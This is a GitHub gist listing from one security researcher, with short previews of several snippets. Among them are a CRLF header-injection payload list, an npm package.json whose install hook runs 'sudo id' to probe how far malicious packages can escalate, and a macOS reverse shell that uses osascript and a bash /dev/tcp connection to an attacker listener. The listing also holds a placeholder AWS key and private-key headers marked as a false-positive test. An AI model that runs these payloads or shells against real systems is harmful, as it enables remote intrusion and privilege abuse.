Skip to content

Instantly share code, notes, and snippets.

View Metnew's full-sized avatar

Vladimir Metnew Metnew

362 followers · 14 following
View GitHub Profile
@Metnew
Metnew / package.json
Created December 21, 2018 02:09
Experiment with permissions when installing malicious packages
{
"name": "saferoot",
"version": "0.0.1",
"description": "",
"main": "index.js",
"scripts": {
"install": "sudo id",
"pre--install": "#sudo npm i --unsafe-perm"
},
"author": "",
@Metnew
Metnew / CRLF.txt
Created December 20, 2018 03:01
CRLF payloads
%0AHeader-Test:BLATRUC
%0A%20Header-Test:BLATRUC
%20%0AHeader-Test:BLATRUC
%23%OAHeader-Test:BLATRUC
%E5%98%8A%E5%98%8DHeader-Test:BLATRUC
%E5%98%8A%E5%98%8D%0AHeader-Test:BLATRUC
%3F%0AHeader-Test:BLATRUC
crlf%0AHeader-Test:BLATRUC
crlf%0A%20Header-Test:BLATRUC
crlf%20%0AHeader-Test:BLATRUC
@Metnew
Metnew / THAT IS A FALSE POSITIVE
Last active February 14, 2019 02:59
FALSE POSITIVE
aws_access_key_id = AKIABTFXD4NW55DB7X3423
@Metnew
Metnew / readme.md
Last active December 14, 2018 01:40
user -> root!
  • elevation of privilege
  • password exploits
  • incorrectly set permissions
  • leveraging SUID/SGID programs
  • code injection
  • trojaned commands
  • PATH exploits
  • misspelling exploit
  • symbolic link exploits
  • document exploits
@Metnew
Metnew / available_domains.json
Last active December 12, 2018 02:47
all available domains (dec 18)
[
"app",
"cloud",
"com",
"guide",
"io",
"net",
"online",
"org",
"plus",
@Metnew
Metnew / nmap-hero.md
Last active December 12, 2018 14:10
Nmap for haxers, <your_tool> for scriptkiddies.

NMAP hero

-F (Fast (limited port) scan) Specifies that you wish to scan fewer ports than the default. Normally Nmap scans the most common 1,000 ports for each scanned protocol. With -F, this is reduced to 100.

Nmap needs an nmap-services file with frequency information in order to know which ports are the most common (see the section called “Well Known Port List: nmap-services” for more about port frequencies). If port frequency information isn't available, perhaps because of the use of a custom nmap-services file, Nmap scans all named ports plus ports 1-1024. In that case, -F means to scan only ports that are named in the services file.

@Metnew
Metnew / gist:09a50c38d398c482b2df59082f0d13c6
Created December 6, 2018 17:47
macos-reverse-shell.sh
# C2
# nc -l 1337
# Root
osascript -e "do shell script \"bash -i >& /dev/tcp/client.ip/1337 0>&1 \" with administrator privileges"
# User
bash -i >& /dev/tcp/client.ip/1337 0>&1
@Metnew
Metnew / brew-my.sh
Created December 1, 2018 00:52
minimal brew commands to start
brew update
brew upgrade
sudo nvram SystemAudioVolume=" "
sudo -v
brew install nano
# brew unlink nano && brew link nano
brew install jq
@Metnew
Metnew / test.htpasswd
Created November 29, 2018 23:36
dropbox
-----BEGIN PGP PRIVATE KEY BLOCK-----
-----BEGIN EC PRIVATE KEY-----
-----BEGIN DSA PRIVATE KEY-----
password
credential
@Metnew
Metnew / keybase.md
Created October 28, 2018 15:04
keybase.md

Keybase proof

I hereby claim:

  • I am metnew on github.
  • I am metnew (https://keybase.io/metnew) on keybase.
  • I have a public key ASARCDaHnKF8_DpR8aRWgXgFF83kdL8nJoYPE2AhYwIn5Ao

To claim this, I am signing this object: